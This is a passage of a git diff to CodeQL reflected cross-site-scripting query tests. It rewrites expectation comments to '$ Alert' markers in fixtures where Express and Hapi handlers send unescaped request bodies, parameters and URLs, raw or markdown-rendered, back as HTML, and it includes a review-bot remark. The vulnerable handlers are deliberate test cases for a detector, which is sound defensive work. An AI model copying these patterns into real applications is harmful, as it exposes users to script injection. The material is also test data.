+| ReflectedXss.js:67:12:67:52 | remark( ... tring() | semmle.label | remark( ... tring() | +| ReflectedXss.js:67:33:67:40 | req.body | semmle.label | req.body | +| ReflectedXss.js:71:12:71:56 | unified ... q.body) | semmle.label | unified ... q.body) | +| ReflectedXss.js:71:12:71:65 | unified ... oString | semmle.label | unified ... 
oString | +| ReflectedXss.js:71:48:71:55 | req.body | semmle.label | req.body | +| ReflectedXss.js:73:20:73:27 | req.body | semmle.label | req.body | +| ReflectedXss.js:73:34:73:34 | f | semmle.label | f | +| ReflectedXss.js:74:14:74:14 | f | semmle.label | f | +| ReflectedXss.js:82:12:82:19 | req.body | semmle.label | req.body | +| ReflectedXss.js:83:12:83:30 | snarkdown(req.body) | semmle.label | snarkdown(req.body) | +| ReflectedXss.js:83:22:83:29 | req.body | semmle.label | req.body | +| ReflectedXss.js:84:12:84:31 | snarkdown2(req.body) | semmle.label | snarkdown2(req.body) | +| ReflectedXss.js:84:23:84:30 | req.body | semmle.label | req.body | +| ReflectedXss.js:96:12:96:19 | req.body | semmle.label | req.body | +| ReflectedXss.js:97:12:97:38 | markdow ... q.body) | semmle.label | markdow ... q.body) | +| ReflectedXss.js:97:30:97:37 | req.body | semmle.label | req.body | +| ReflectedXss.js:99:12:99:39 | markdow ... q.body) | semmle.label | markdow ... q.body) | +| ReflectedXss.js:99:31:99:38 | req.body | semmle.label | req.body | +| ReflectedXss.js:102:12:102:84 | markdow ... q.body) | semmle.label | markdow ... 
q.body) | +| ReflectedXss.js:102:76:102:83 | req.body | semmle.label | req.body | +| ReflectedXss.js:109:16:109:30 | request.query.p | semmle.label | request.query.p | +| ReflectedXss.js:113:11:113:41 | queryKeys | semmle.label | queryKeys | +| ReflectedXss.js:113:13:113:27 | keys: queryKeys | semmle.label | keys: queryKeys | +| ReflectedXss.js:115:11:115:45 | keys | semmle.label | keys | +| ReflectedXss.js:115:18:115:26 | queryKeys | semmle.label | queryKeys | +| ReflectedXss.js:115:31:115:45 | paramKeys?.keys | semmle.label | paramKeys?.keys | +| ReflectedXss.js:117:11:117:61 | keyArray | semmle.label | keyArray | +| ReflectedXss.js:117:11:117:61 | keyArray [0] | semmle.label | keyArray [0] | +| ReflectedXss.js:117:49:117:54 | [keys] [0] | semmle.label | [keys] [0] | +| ReflectedXss.js:117:50:117:53 | keys | semmle.label | keys | +| ReflectedXss.js:117:58:117:61 | keys | semmle.label | keys | +| ReflectedXss.js:118:11:118:72 | invalidKeys | semmle.label | invalidKeys | +| ReflectedXss.js:118:11:118:72 | invalidKeys [0] | semmle.label | invalidKeys [0] | +| ReflectedXss.js:118:25:118:32 | keyArray | semmle.label | keyArray | +| ReflectedXss.js:118:25:118:32 | keyArray [0] | semmle.label | keyArray [0] | +| ReflectedXss.js:118:25:118:72 | keyArra ... s(key)) | semmle.label | keyArra ... s(key)) | +| ReflectedXss.js:118:25:118:72 | keyArra ... s(key)) [0] | semmle.label | keyArra ... s(key)) [0] | +| ReflectedXss.js:121:30:121:73 | `${inva ... telist` | semmle.label | `${inva ... telist` | +| ReflectedXss.js:121:33:121:43 | invalidKeys | semmle.label | invalidKeys | +| ReflectedXss.js:121:33:121:43 | invalidKeys [0] | semmle.label | invalidKeys [0] | +| ReflectedXss.js:121:33:121:54 | invalid ... n(', ') | semmle.label | invalid ... n(', ') | | ReflectedXssContentTypes.js:10:14:10:36 | "FOO: " ... rams.id | semmle.label | "FOO: " ... 
rams.id | | ReflectedXssContentTypes.js:10:24:10:36 | req.params.id | semmle.label | req.params.id | | ReflectedXssContentTypes.js:20:14:20:36 | "FOO: " ... rams.id | semmle.label | "FOO: " ... rams.id | 
@@ -341,60 +398,3 @@ nodes | tst3.js:12:12:12:15 | code | semmle.label | code | subpaths | ReflectedXssGood3.js:139:24:139:26 | url | ReflectedXssGood3.js:68:22:68:26 | value | ReflectedXssGood3.js:108:10:108:23 | parts.join('') | ReflectedXssGood3.js:139:12:139:27 | escapeHtml3(url) | -#select -| ReflectedXss.js:8:14:8:45 | "Unknow ... rams.id | ReflectedXss.js:8:33:8:45 | req.params.id | ReflectedXss.js:8:14:8:45 | "Unknow ... rams.id | Cross-site scripting vulnerability due to a $@. | ReflectedXss.js:8:33:8:45 | req.params.id | user-provided value | -| ReflectedXss.js:17:12:17:39 | "Unknow ... rams.id | ReflectedXss.js:17:31:17:39 | params.id | ReflectedXss.js:17:12:17:39 | "Unknow ... rams.id | Cross-site scripting vulnerability due to a $@. | ReflectedXss.js:17:31:17:39 | params.id | user-provided value | -| ReflectedXss.js:22:12:22:19 | req.body | ReflectedXss.js:22:12:22:19 | req.body | ReflectedXss.js:22:12:22:19 | req.body | Cross-site scripting vulnerability due to a $@. | ReflectedXss.js:22:12:22:19 | req.body | user-provided value | -| ReflectedXss.js:23:12:23:27 | marked(req.body) | ReflectedXss.js:23:19:23:26 | req.body | ReflectedXss.js:23:12:23:27 | marked(req.body) | Cross-site scripting vulnerability due to a $@. | ReflectedXss.js:23:19:23:26 | req.body | user-provided value | -| ReflectedXss.js:29:12:29:19 | req.body | ReflectedXss.js:29:12:29:19 | req.body | ReflectedXss.js:29:12:29:19 | req.body | Cross-site scripting vulnerability due to a $@. | ReflectedXss.js:29:12:29:19 | req.body | user-provided value | -| ReflectedXss.js:34:12:34:18 | mytable | ReflectedXss.js:32:14:32:21 | req.body | ReflectedXss.js:34:12:34:18 | mytable | Cross-site scripting vulnerability due to a $@. | ReflectedXss.js:32:14:32:21 | req.body | user-provided value | -| ReflectedXss.js:41:12:41:19 | req.body | ReflectedXss.js:41:12:41:19 | req.body | ReflectedXss.js:41:12:41:19 | req.body | Cross-site scripting vulnerability due to a $@. 
| ReflectedXss.js:41:12:41:19 | req.body | user-provided value | -| ReflectedXss.js:42:12:42:39 | convert ... q.body) | ReflectedXss.js:42:31:42:38 | req.body | ReflectedXss.js:42:12:42:39 | convert ... q.body) | Cross-site scripting vulnerability due to a $@. | ReflectedXss.js:42:31:42:38 | req.body | user-provided value | -| ReflectedXss.js:56:12:56:19 | req.body | ReflectedXss.js:56:12:56:19 | req.body | ReflectedXss.js:56:12:56:19 | req.body | Cross-site scripting vulnerability due to a $@. | ReflectedXss.js:56:12:56:19 | req.body | user-provided value | -| ReflectedXss.js:65:16:65:19 | file | ReflectedXss.js:64:14:64:21 | req.body | ReflectedXss.js:65:16:65:19 | file | Cross-site scripting vulnerability due to a $@. | ReflectedXss.js:64:14:64:21 | req.body | user-provided value | -| ReflectedXss.js:68:12:68:52 | remark( ... tring() | ReflectedXss.js:68:33:68:40 | req.body | ReflectedXss.js:68:12:68:52 | remark( ... tring() | Cross-site scripting vulnerability due to a $@. | ReflectedXss.js:68:33:68:40 | req.body | user-provided value | -| ReflectedXss.js:72:12:72:65 | unified ... oString | ReflectedXss.js:72:48:72:55 | req.body | ReflectedXss.js:72:12:72:65 | unified ... oString | Cross-site scripting vulnerability due to a $@. | ReflectedXss.js:72:48:72:55 | req.body | user-provided value | -| ReflectedXss.js:75:14:75:14 | f | ReflectedXss.js:74:20:74:27 | req.body | ReflectedXss.js:75:14:75:14 | f | Cross-site scripting vulnerability due to a $@. | ReflectedXss.js:74:20:74:27 | req.body | user-provided value | -| ReflectedXss.js:83:12:83:19 | req.body | ReflectedXss.js:83:12:83:19 | req.body | ReflectedXss.js:83:12:83:19 | req.body | Cross-site scripting vulnerability due to a $@. | ReflectedXss.js:83:12:83:19 | req.body | user-provided value | -| ReflectedXss.js:84:12:84:30 | snarkdown(req.body) | ReflectedXss.js:84:22:84:29 | req.body | ReflectedXss.js:84:12:84:30 | snarkdown(req.body) | Cross-site scripting vulnerability due to a $@. 
| ReflectedXss.js:84:22:84:29 | req.body | user-provided value | -| ReflectedXss.js:85:12:85:31 | snarkdown2(req.body) | ReflectedXss.js:85:23:85:30 | req.body | ReflectedXss.js:85:12:85:31 | snarkdown2(req.body) | Cross-site scripting vulnerability due to a $@. | ReflectedXss.js:85:23:85:30 | req.body | user-provided value | -| ReflectedXss.js:97:12:97:19 | req.body | ReflectedXss.js:97:12:97:19 | req.body | ReflectedXss.js:97:12:97:19 | req.body | Cross-site scripting vulnerability due to a $@. | ReflectedXss.js:97:12:97:19 | req.body | user-provided value | -| ReflectedXss.js:98:12:98:38 | markdow ... q.body) | ReflectedXss.js:98:30:98:37 | req.body | ReflectedXss.js:98:12:98:38 | markdow ... q.body) | Cross-site scripting vulnerability due to a $@. | ReflectedXss.js:98:30:98:37 | req.body | user-provided value | -| ReflectedXss.js:100:12:100:39 | markdow ... q.body) | ReflectedXss.js:100:31:100:38 | req.body | ReflectedXss.js:100:12:100:39 | markdow ... q.body) | Cross-site scripting vulnerability due to a $@. | ReflectedXss.js:100:31:100:38 | req.body | user-provided value | -| ReflectedXss.js:103:12:103:84 | markdow ... q.body) | ReflectedXss.js:103:76:103:83 | req.body | ReflectedXss.js:103:12:103:84 | markdow ... q.body) | Cross-site scripting vulnerability due to a $@. | ReflectedXss.js:103:76:103:83 | req.body | user-provided value | -| ReflectedXss.js:110:16:110:30 | request.query.p | ReflectedXss.js:110:16:110:30 | request.query.p | ReflectedXss.js:110:16:110:30 | request.query.p | Cross-site scripting vulnerability due to a $@. | ReflectedXss.js:110:16:110:30 | request.query.p | user-provided value | -| ReflectedXss.js:122:30:122:73 | `${inva ... telist` | ReflectedXss.js:114:13:114:27 | keys: queryKeys | ReflectedXss.js:122:30:122:73 | `${inva ... telist` | Cross-site scripting vulnerability due to a $@. | ReflectedXss.js:114:13:114:27 | keys: queryKeys | user-provided value | -| ReflectedXss.js:122:30:122:73 | `${inva ... 
telist` | ReflectedXss.js:116:31:116:45 | paramKeys?.keys | ReflectedXss.js:122:30:122:73 | `${inva ... telist` | Cross-site scripting vulnerability due to a $@. | ReflectedXss.js:116:31:116:45 | paramKeys?.keys | user-provided value | -| ReflectedXssContentTypes.js:10:14:10:36 | "FOO: " ... rams.id | ReflectedXssContentTypes.js:10:24:10:36 | req.params.id | ReflectedXssContentTypes.js:10:14:10:36 | "FOO: " ... rams.id | Cross-site scripting vulnerability due to a $@. | ReflectedXssContentTypes.js:10:24:10:36 | req.params.id | user-provided value | -| ReflectedXssContentTypes.js:20:14:20:36 | "FOO: " ... rams.id | ReflectedXssContentTypes.js:20:24:20:36 | req.params.id | ReflectedXssContentTypes.js:20:14:20:36 | "FOO: " ... rams.id | Cross-site scripting vulnerability due to a $@. | ReflectedXssContentTypes.js:20:24:20:36 | req.params.id | user-provided value | -| ReflectedXssContentTypes.js:39:13:39:35 | "FOO: " ... rams.id | ReflectedXssContentTypes.js:39:23:39:35 | req.params.id | ReflectedXssContentTypes.js:39:13:39:35 | "FOO: " ... rams.id | Cross-site scripting vulnerability due to a $@. | ReflectedXssContentTypes.js:39:23:39:35 | req.params.id | user-provided value | -| ReflectedXssContentTypes.js:70:12:70:34 | "FOO: " ... rams.id | ReflectedXssContentTypes.js:70:22:70:34 | req.params.id | ReflectedXssContentTypes.js:70:12:70:34 | "FOO: " ... rams.id | Cross-site scripting vulnerability due to a $@. | ReflectedXssContentTypes.js:70:22:70:34 | req.params.id | user-provided value | -| ReflectedXssGood3.js:139:12:139:27 | escapeHtml3(url) | ReflectedXssGood3.js:135:15:135:27 | req.params.id | ReflectedXssGood3.js:139:12:139:27 | escapeHtml3(url) | Cross-site scripting vulnerability due to a $@. | ReflectedXssGood3.js:135:15:135:27 | req.params.id | user-provided value | -| etherpad.js:11:12:11:19 | response | etherpad.js:9:16:9:30 | req.query.jsonp | etherpad.js:11:12:11:19 | response | Cross-site scripting vulnerability due to a $@. 
| etherpad.js:9:16:9:30 | req.query.jsonp | user-provided value | -| formatting.js:6:14:6:47 | util.fo ... , evil) | formatting.js:4:16:4:29 | req.query.evil | formatting.js:6:14:6:47 | util.fo ... , evil) | Cross-site scripting vulnerability due to a $@. | formatting.js:4:16:4:29 | req.query.evil | user-provided value | -| formatting.js:7:14:7:53 | require ... , evil) | formatting.js:4:16:4:29 | req.query.evil | formatting.js:7:14:7:53 | require ... , evil) | Cross-site scripting vulnerability due to a $@. | formatting.js:4:16:4:29 | req.query.evil | user-provided value | -| live-server.js:6:13:6:50 | ` ... /html>` | live-server.js:4:21:4:27 | req.url | live-server.js:6:13:6:50 | ` ... /html>` | Cross-site scripting vulnerability due to a $@. | live-server.js:4:21:4:27 | req.url | user-provided value | -| live-server.js:12:13:12:50 | ` ... /html>` | live-server.js:10:21:10:27 | req.url | live-server.js:12:13:12:50 | ` ... /html>` | Cross-site scripting vulnerability due to a $@. | live-server.js:10:21:10:27 | req.url | user-provided value | -| pages/Next.jsx:8:13:8:19 | req.url | pages/Next.jsx:8:13:8:19 | req.url | pages/Next.jsx:8:13:8:19 | req.url | Cross-site scripting vulnerability due to a $@. | pages/Next.jsx:8:13:8:19 | req.url | user-provided value | -| pages/Next.jsx:15:13:15:19 | req.url | pages/Next.jsx:15:13:15:19 | req.url | pages/Next.jsx:15:13:15:19 | req.url | Cross-site scripting vulnerability due to a $@. | pages/Next.jsx:15:13:15:19 | req.url | user-provided value | -| pages/api/myapi.js:2:14:2:20 | req.url | pages/api/myapi.js:2:14:2:20 | req.url | pages/api/myapi.js:2:14:2:20 | req.url | Cross-site scripting vulnerability due to a $@. | pages/api/myapi.js:2:14:2:20 | req.url | user-provided value | -| partial.js:10:14:10:18 | x + y | partial.js:13:42:13:48 | req.url | partial.js:10:14:10:18 | x + y | Cross-site scripting vulnerability due to a $@. 
| partial.js:13:42:13:48 | req.url | user-provided value | -| partial.js:19:14:19:18 | x + y | partial.js:22:51:22:57 | req.url | partial.js:19:14:19:18 | x + y | Cross-site scripting vulnerability due to a $@. | partial.js:22:51:22:57 | req.url | user-provided value | -| partial.js:28:14:28:18 | x + y | partial.js:31:47:31:53 | req.url | partial.js:28:14:28:18 | x + y | Cross-site scripting vulnerability due to a $@. | partial.js:31:47:31:53 | req.url | user-provided value | -| partial.js:37:14:37:18 | x + y | partial.js:40:43:40:49 | req.url | partial.js:37:14:37:18 | x + y | Cross-site scripting vulnerability due to a $@. | partial.js:40:43:40:49 | req.url | user-provided value | -| promises.js:6:25:6:25 | x | promises.js:5:44:5:57 | req.query.data | promises.js:6:25:6:25 | x | Cross-site scripting vulnerability due to a $@. | promises.js:5:44:5:57 | req.query.data | user-provided value | -| tst2.js:7:12:7:12 | p | tst2.js:6:9:6:9 | p | tst2.js:7:12:7:12 | p | Cross-site scripting vulnerability due to a $@. | tst2.js:6:9:6:9 | p | user-provided value | -| tst2.js:8:12:8:12 | r | tst2.js:6:12:6:15 | q: r | tst2.js:8:12:8:12 | r | Cross-site scripting vulnerability due to a $@. | tst2.js:6:12:6:15 | q: r | user-provided value | -| tst2.js:18:12:18:12 | p | tst2.js:14:9:14:9 | p | tst2.js:18:12:18:12 | p | Cross-site scripting vulnerability due to a $@. | tst2.js:14:9:14:9 | p | user-provided value | -| tst2.js:21:14:21:14 | p | tst2.js:14:9:14:9 | p | tst2.js:21:14:21:14 | p | Cross-site scripting vulnerability due to a $@. | tst2.js:14:9:14:9 | p | user-provided value | -| tst2.js:36:12:36:12 | p | tst2.js:30:9:30:9 | p | tst2.js:36:12:36:12 | p | Cross-site scripting vulnerability due to a $@. | tst2.js:30:9:30:9 | p | user-provided value | -| tst2.js:37:12:37:18 | other.p | tst2.js:30:9:30:9 | p | tst2.js:37:12:37:18 | other.p | Cross-site scripting vulnerability due to a $@. 
| tst2.js:30:9:30:9 | p | user-provided value | -| tst2.js:51:12:51:17 | unsafe | tst2.js:43:9:43:9 | p | tst2.js:51:12:51:17 | unsafe | Cross-site scripting vulnerability due to a $@. | tst2.js:43:9:43:9 | p | user-provided value | -| tst2.js:63:12:63:12 | p | tst2.js:57:9:57:9 | p | tst2.js:63:12:63:12 | p | Cross-site scripting vulnerability due to a $@. | tst2.js:57:9:57:9 | p | user-provided value | -| tst2.js:64:12:64:18 | other.p | tst2.js:57:9:57:9 | p | tst2.js:64:12:64:18 | other.p | Cross-site scripting vulnerability due to a $@. | tst2.js:57:9:57:9 | p | user-provided value | -| tst2.js:75:12:75:12 | p | tst2.js:69:9:69:9 | p | tst2.js:75:12:75:12 | p | Cross-site scripting vulnerability due to a $@. | tst2.js:69:9:69:9 | p | user-provided value | -| tst2.js:76:12:76:18 | other.p | tst2.js:69:9:69:9 | p | tst2.js:76:12:76:18 | other.p | Cross-site scripting vulnerability due to a $@. | tst2.js:69:9:69:9 | p | user-provided value | -| tst2.js:88:12:88:12 | p | tst2.js:82:9:82:9 | p | tst2.js:88:12:88:12 | p | Cross-site scripting vulnerability due to a $@. | tst2.js:82:9:82:9 | p | user-provided value | -| tst2.js:89:12:89:18 | other.p | tst2.js:82:9:82:9 | p | tst2.js:89:12:89:18 | other.p | Cross-site scripting vulnerability due to a $@. | tst2.js:82:9:82:9 | p | user-provided value | -| tst3.js:6:12:6:12 | p | tst3.js:5:9:5:9 | p | tst3.js:6:12:6:12 | p | Cross-site scripting vulnerability due to a $@. | tst3.js:5:9:5:9 | p | user-provided value | -| tst3.js:12:12:12:15 | code | tst3.js:11:32:11:39 | reg.body | tst3.js:12:12:12:15 | code | Cross-site scripting vulnerability due to a $@. | tst3.js:11:32:11:39 | reg.body | user-provided value | diff --git a/javascript/ql/test/query-tests/Security/CWE-079/ReflectedXss/ReflectedXss.js b/javascript/ql/test/query-tests/Security/CWE-079/ReflectedXss/ReflectedXss.js index dee88dd177bc..343e27b3fce5 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/ReflectedXss/ReflectedXss.js 
+++ b/javascript/ql/test/query-tests/Security/CWE-079/ReflectedXss/ReflectedXss.js @@ -4,8 +4,7 @@ var app = express(); app.get('/user/:id', function(req, res) { if (!isValidUserId(req.params.id)) { - // BAD: a request parameter is incorporated without validation into the response - res.send("Unknown user: " + req.params.id); + res.send("Unknown user: " + req.params.id); // $ Alert - a request parameter is incorporated without validation into the response moreBadStuff(req.params, res); } else { // TODO: do something exciting @@ -14,32 +13,32 @@ app.get('/user/:id', function(req, res) { }); function moreBadStuff(params, res) { - res.send("Unknown user: " + params.id); // NOT OK + res.send("Unknown user: " + params.id); // $ Alert } var marked = require("marked"); app.get('/user/:id', function(req, res) { - res.send(req.body); // NOT OK - res.send(marked(req.body)); // NOT OK + res.send(req.body); // $ Alert + res.send(marked(req.body)); // $ Alert }); var table = require('markdown-table') app.get('/user/:id', function(req, res) { - res.send(req.body); // NOT OK + res.send(req.body); // $ Alert var mytable = table([ ['Name', 'Content'], - ['body', req.body] + ['body', req.body] // $ Source ]); - res.send(mytable); // NOT OK + res.send(mytable); // $ Alert }); var showdown = require('showdown'); var converter = new showdown.Converter(); app.get('/user/:id', function(req, res) { - res.send(req.body); // NOT OK - res.send(converter.makeHtml(req.body)); // NOT OK + res.send(req.body); // $ Alert + res.send(converter.makeHtml(req.body)); // $ Alert }); var unified = require('unified'); @@ -53,7 +52,7 @@ var sanitize = require("rehype-sanitize"); const { resetExtensions } = require('showdown'); app.get('/user/:id', function (req, res) { - res.send(req.body); // NOT OK + res.send(req.body); // $ Alert unified() .use(markdown) 
@@ -61,18 +60,18 @@ app.get('/user/:id', function (req, res) { .use(doc, { title: '👋🌍' }) .use(format) .use(html) - .process(req.body, function (err, file) { - res.send(file); // NOT OK + .process(req.body, function (err, file) { // $ Source + res.send(file); // $ Alert }); - res.send(remark().processSync(req.body).toString()); // NOT OK + res.send(remark().processSync(req.body).toString()); // $ Alert - res.send(remark().use(sanitize).processSync(req.body).toString()); // OK + res.send(remark().use(sanitize).processSync(req.body).toString()); - res.send(unified().use(markdown).processSync(req.body).toString); // NOT OK + res.send(unified().use(markdown).processSync(req.body).toString); // $ Alert - remark().process(req.body, (e, f) => { - res.send(f); // NOT OK + remark().process(req.body, (e, f) => { // $ Source + res.send(f); // $ Alert }) }); @@ -80,9 +79,9 @@ import snarkdown from 'snarkdown'; var snarkdown2 = require("snarkdown"); app.get('/user/:id', function (req, res) { - res.send(req.body); // NOT OK - res.send(snarkdown(req.body)); // NOT OK - res.send(snarkdown2(req.body)); // NOT OK + res.send(req.body); // $ Alert + res.send(snarkdown(req.body)); // $ Alert + res.send(snarkdown2(req.body)); // $ Alert }); const markdownIt = require('markdown-it')({ 
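Review bot: In the `@@ -61,18 +60,18 @@` hunk the `unified()` case passes `.toString` to `res.send` without calling it, so its `// $ Alert` is pinned to a method reference rather than to the rendered output that the neighbouring `remark().processSync(req.body).toString()` case sends. If the missing call is unintentional, `res.send(unified().use(markdown).processSync(req.body).toString()); // $ Alert` would exercise the markdown-to-HTML flow this case appears to target; the column ranges recorded for that line in the `.expected` files would then need regenerating. If it is deliberate, a short trailing reason after `$ Alert` would say so. The enclosing handler starts above this hunk.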
@@ -94,32 +93,32 @@ const markdownIt3 = require('markdown-it')({html: true}) .use(require('markdown-it-highlightjs')); app.get('/user/:id', function (req, res) { - res.send(req.body); // NOT OK - res.send(markdownIt.render(req.body)); // NOT OK + res.send(req.body); // $ Alert + res.send(markdownIt.render(req.body)); // $ Alert res.send(markdownIt2.render(req.body)); // OK - no html - res.send(markdownIt3.render(req.body)); // NOT OK + res.send(markdownIt3.render(req.body)); // $ Alert - res.send(markdownIt.use(require('markdown-it-sanitizer')).render(req.body)); // OK - HTML is sanitized. - res.send(markdownIt.use(require('markdown-it-abbr')).use(unknown).render(req.body)); // NOT OK + res.send(markdownIt.use(require('markdown-it-sanitizer')).render(req.body)); // OK - HTML is sanitized. + res.send(markdownIt.use(require('markdown-it-abbr')).use(unknown).render(req.body)); // $ Alert }); var Hapi = require('hapi'); var hapi = new Hapi.Server(); hapi.route({ handler: function (request){ - return request.query.p; // NOT OK + return request.query.p; // $ Alert }}); app.get("invalid/keys/:id", async (req, res) => { - const { keys: queryKeys } = req.query; + const { keys: queryKeys } = req.query; // $ Source const paramKeys = req.params; - const keys = queryKeys || paramKeys?.keys; + const keys = queryKeys || paramKeys?.keys; // $ Source const keyArray = typeof keys === 'string' ? [keys] : keys; const invalidKeys = keyArray.filter(key => !whitelist.includes(key)); if (invalidKeys.length) { - res.status(400).send(`${invalidKeys.join(', ')} not in whitelist`); + res.status(400).send(`${invalidKeys.join(', ')} not in whitelist`); // $ Alert return; } }); diff --git a/javascript/ql/test/query-tests/Security/CWE-079/ReflectedXss/ReflectedXss.qlref b/javascript/ql/test/query-tests/Security/CWE-079/ReflectedXss/ReflectedXss.qlref index e0efe1024162..9cd0122e556e 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/ReflectedXss/ReflectedXss.qlref 
+++ b/javascript/ql/test/query-tests/Security/CWE-079/ReflectedXss/ReflectedXss.qlref @@ -1 +1,2 @@ -Security/CWE-079/ReflectedXss.ql +query: Security/CWE-079/ReflectedXss.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/javascript/ql/test/query-tests/Security/CWE-079/ReflectedXss/ReflectedXssContentTypes.js b/javascript/ql/test/query-tests/Security/CWE-079/ReflectedXss/ReflectedXssContentTypes.js index 64acfded0a63..cf89f45b9692 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/ReflectedXss/ReflectedXssContentTypes.js +++ b/javascript/ql/test/query-tests/Security/CWE-079/ReflectedXss/ReflectedXssContentTypes.js @@ -7,7 +7,7 @@ app.get('/user/:id', function (req, res) { res.send("FOO: " + req.params.id); // OK - content type is plain text } else { res.set('Content-Type', 'text/html'); - res.send("FOO: " + req.params.id); // NOT OK - content type is HTML. + res.send("FOO: " + req.params.id); // $ Alert - content type is HTML. } }); @@ -17,7 +17,7 @@ app.get('/user/:id', function (req, res) { res.send("FOO: " + req.params.id); // OK - content type is JSON } else { res.writeHead(404); - res.send("FOO: " + req.params.id); // NOT OK - content type is not set. + res.send("FOO: " + req.params.id); // $ Alert - content type is not set. } }); @@ -36,10 +36,10 @@ app.get('/user/:id', function (req, res) { app.get('/user/:id', function (req, res) { if (err) { res.statusCode = 404; - res.end("FOO: " + req.params.id); // NOT OK + res.end("FOO: " + req.params.id); // $ Alert } else { res.setHeader('Content-Type', 'text/plain;charset=utf8'); - res.end("FOO: " + req.params.id); // OK + res.end("FOO: " + req.params.id); } }); 
@@ -50,10 +50,10 @@ function textContentType() { app.get('/user/:id', function (req, res) { if (err) { res.header({'Content-Type': textContentType()}); - res.end("FOO: " + req.params.id); // OK + res.end("FOO: " + req.params.id); } else { res.setHeader('Content-Type', 'text/plain;charset=utf8'); - res.end("FOO: " + req.params.id); // OK + res.end("FOO: " + req.params.id); } }); @@ -67,13 +67,13 @@ app.get('/user/:id', function (req, res) { somethingMore(); while(Math.random()) {}; res.writeHead(404); - res.send("FOO: " + req.params.id); // NOT OK - content type is not set. + res.send("FOO: " + req.params.id); // $ Alert - content type is not set. }); app.get('/user/:id', function (req, res) { res.header({'Content-Type': textContentType()}); myFancyFunction(() => { - res.send("FOO: " + req.params.id); // OK + res.send("FOO: " + req.params.id); }); - res.end("FOO: " + req.params.id); // OK + res.end("FOO: " + req.params.id); }); \ No newline at end of file diff --git a/javascript/ql/test/query-tests/Security/CWE-079/ReflectedXss/ReflectedXssGood.js b/javascript/ql/test/query-tests/Security/CWE-079/ReflectedXss/ReflectedXssGood.js index c6635459f42f..a92226bff122 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/ReflectedXss/ReflectedXssGood.js +++ b/javascript/ql/test/query-tests/Security/CWE-079/ReflectedXss/ReflectedXssGood.js @@ -5,7 +5,7 @@ var app = express(); app.get('/user/:id', function(req, res) { if (!isValidUserId(req.params.id)) - // GOOD: request parameter is sanitized before incorporating it into the response + // OK - request parameter is sanitized before incorporating it into the response res.send("Unknown user: " + escape(req.params.id)); else // TODO: do something exciting 
@@ -15,13 +15,13 @@ app.get('/user/:id', function(req, res) { app.get('/user/:id', function(req, res) { if (!isValidUserId(req.params.id)) - // GOOD: templating prevents XSS + // OK - templating prevents XSS res.render(invalidUserIdTemplate, { id: req.params.id }); }); app.get('/user/:id', function(req, res) { if (!isValidUserId(req.params.id)) { - // GOOD: response content type set to text + // OK - response content type set to text res.set('Content-Type', 'text/plain'); res.send("Unknown user: " + req.params.id); } else @@ -35,7 +35,7 @@ function textContentType() { app.get('/user/:id', function(req, res) { if (!isValidUserId(req.params.id)) { - // GOOD: response content type set to text + // OK - response content type set to text res.set('Content-Type', textContentType()); res.send("Unknown user: " + req.params.id); } else @@ -53,7 +53,7 @@ app.get('/echo', function(req, res) { app.get('/user/:id', function(req, res) { const url = req.params.id; if (!/["'&<>]/.exec(url)) { - res.send(url); // OK + res.send(url); } }); @@ -66,7 +66,7 @@ function escapeHtml1 (str) { app.get('/user/:id', function(req, res) { const url = req.params.id; - res.send(escapeHtml1(url)); // OK + res.send(escapeHtml1(url)); }); const matchHtmlRegExp = /["'&<>]/; @@ -82,6 +82,6 @@ function escapeHtml2 (string) { app.get('/user/:id', function(req, res) { const url = req.params.id; - res.send(escapeHtml2(url)); // OK + res.send(escapeHtml2(url)); }); diff --git a/javascript/ql/test/query-tests/Security/CWE-079/ReflectedXss/ReflectedXssGood3.js b/javascript/ql/test/query-tests/Security/CWE-079/ReflectedXss/ReflectedXssGood3.js index 2217ab783ac7..996f093aa15c 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/ReflectedXss/ReflectedXssGood3.js +++ b/javascript/ql/test/query-tests/Security/CWE-079/ReflectedXss/ReflectedXssGood3.js 
@@ -132,11 +132,11 @@ function escapeHtml4(s) { } app.get('/user/:id', function (req, res) { - const url = req.params.id; + const url = req.params.id; // $ Source - res.send(escapeHtml1(url)); // OK - res.send(escapeHtml2(url)); // OK - res.send(escapeHtml3(url)); // OK - but FP [INCONSISTENCY] - res.send(escapeHtml4(url)); // OK + res.send(escapeHtml1(url)); + res.send(escapeHtml2(url)); + res.send(escapeHtml3(url)); // $ SPURIOUS: Alert - FP + res.send(escapeHtml4(url)); }); diff --git a/javascript/ql/test/query-tests/Security/CWE-079/ReflectedXss/ReflectedXssWithCustomSanitizer.expected b/javascript/ql/test/query-tests/Security/CWE-079/ReflectedXss/ReflectedXssWithCustomSanitizer.expected index a367f07307a5..fb0748b3acdd 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/ReflectedXss/ReflectedXssWithCustomSanitizer.expected +++ b/javascript/ql/test/query-tests/Security/CWE-079/ReflectedXss/ReflectedXssWithCustomSanitizer.expected 
@@ -1,26 +1,26 @@ -| ReflectedXss.js:8:14:8:45 | "Unknow ... rams.id | Cross-site scripting vulnerability due to $@. | ReflectedXss.js:8:33:8:45 | req.params.id | user-provided value | -| ReflectedXss.js:17:12:17:39 | "Unknow ... rams.id | Cross-site scripting vulnerability due to $@. | ReflectedXss.js:17:31:17:39 | params.id | user-provided value | -| ReflectedXss.js:22:12:22:19 | req.body | Cross-site scripting vulnerability due to $@. | ReflectedXss.js:22:12:22:19 | req.body | user-provided value | -| ReflectedXss.js:23:12:23:27 | marked(req.body) | Cross-site scripting vulnerability due to $@. | ReflectedXss.js:23:19:23:26 | req.body | user-provided value | -| ReflectedXss.js:29:12:29:19 | req.body | Cross-site scripting vulnerability due to $@. | ReflectedXss.js:29:12:29:19 | req.body | user-provided value | -| ReflectedXss.js:34:12:34:18 | mytable | Cross-site scripting vulnerability due to $@. | ReflectedXss.js:32:14:32:21 | req.body | user-provided value | -| ReflectedXss.js:41:12:41:19 | req.body | Cross-site scripting vulnerability due to $@. | ReflectedXss.js:41:12:41:19 | req.body | user-provided value | -| ReflectedXss.js:42:12:42:39 | convert ... q.body) | Cross-site scripting vulnerability due to $@. | ReflectedXss.js:42:31:42:38 | req.body | user-provided value | -| ReflectedXss.js:56:12:56:19 | req.body | Cross-site scripting vulnerability due to $@. | ReflectedXss.js:56:12:56:19 | req.body | user-provided value | -| ReflectedXss.js:65:16:65:19 | file | Cross-site scripting 